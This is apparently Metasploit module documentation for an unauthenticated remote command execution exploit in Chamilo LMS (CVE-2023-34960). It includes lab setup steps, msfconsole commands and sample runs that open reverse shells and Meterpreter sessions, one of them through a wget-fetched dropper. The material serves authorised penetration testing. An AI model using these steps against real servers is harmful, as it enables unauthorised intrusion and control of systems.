## Vulnerable Application
`Chamilo` is an e-learning platform, also called Learning Management Systems (LMS).
This module exploits an unauthenticated remote command execution vulnerability that affects Chamilo versions `1.11.18`
and below. See [CVE-2023-34960](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34960).
Due to a functionality called `Chamilo Rapid` to easily convert PowerPoint slides to courses on Chamilo,
it is possible for an unauthenticated remote attacker to execute arbitrary commands at OS level using a malicious SOAP
request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.

Read this [article](https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960) on attackerkb.com for more details.

This module has been tested against Chamilo 1.11.18 on Ubuntu Linux 22.04 with PHP 7.4

### Installation
Instructions for a Chamilo installation on Ubuntu 22.04:
1. Download and install Ubuntu 22.04 server on VirtualBox (follow these [instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/)).
2. Download and install LAMP on Ubuntu 22.04 server (follow these [instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/)).
3. Download Chamilo releases [here](https://github.com/chamilo/chamilo-lms/releases).
4. Follow installation instructions [here](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites).

## Verification Steps

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960`
- [ ] `set rhosts <ip-target>`
- [ ] `set rport <port>`
- [ ] `set lhost <ip-attacker>`
- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
- [ ] `exploit`
- [ ] you should get a `reverse shell` or `Meterpreter`
```
msf exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > options

Module options (exploit/linux/http/chamilo_unauth_rce_cve_2023_34960):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                         cs/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The Chamilo endpoint URL
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                        local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


   When TARGET is 0:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generat
                                        ed if left unset.


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP
```
## Options

### TARGETURI
The uripath to the `Chamilo` web application. Default set is to `/`.

### WEBSHELL
You can use this option to set the filename and extension (should be .php) of the webshell.
This is handy if you want to test the webshell upload and execution with different file names.
to bypass any security settings on the Web and PHP server.

## Scenarios
### Ubuntu 22.04 PHP - php/meterpreter/reverse_tcp
```
msf exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.47:80 can be exploited.
[+] The target is vulnerable.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.47
[+] Deleted cfLzNvTgdlp.php
[*] Meterpreter session 23 opened (192.168.201.10:4444 -> 192.168.201.47:42220) at 2023-07-28 20:29:19 +0000

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : cuckoo
OS          : Linux cuckoo 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter >
```
### Ubuntu 22.04 Unix Command - cmd/unix/reverse_bash
```
msf exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > set target 1
target => 1
msf exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.47:80 can be exploited.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 24 opened (192.168.201.10:4444 -> 192.168.201.47:32810) at 2023-07-28 20:30:48 +0000

uname -a
Linux cuckoo 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Ubuntu 22.04 Linux Dropper - linux/x64/meterpreter/reverse_tcp
```
msf exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > set target 2
target => 2
msf exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.47:80 can be exploited.
[+] The target is vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/hexZf4ppmqBlG
[*] Client 192.168.201.47 (Wget/1.21.2) requested /hexZf4ppmqBlG
[*] Sending payload to 192.168.201.47 (Wget/1.21.2)
[*] Sending stage (3045348 bytes) to 192.168.201.47
[*] Meterpreter session 25 opened (192.168.201.10:4444 -> 192.168.201.47:55508) at 2023-07-28 20:32:02 +0000
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 192.168.201.47
OS           : Ubuntu 22.04 (Linux 5.15.0-76-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/var/www/html/chamilo/main/inc/lib/ppt2png
meterpreter >
```

## Limitations
No limitations.
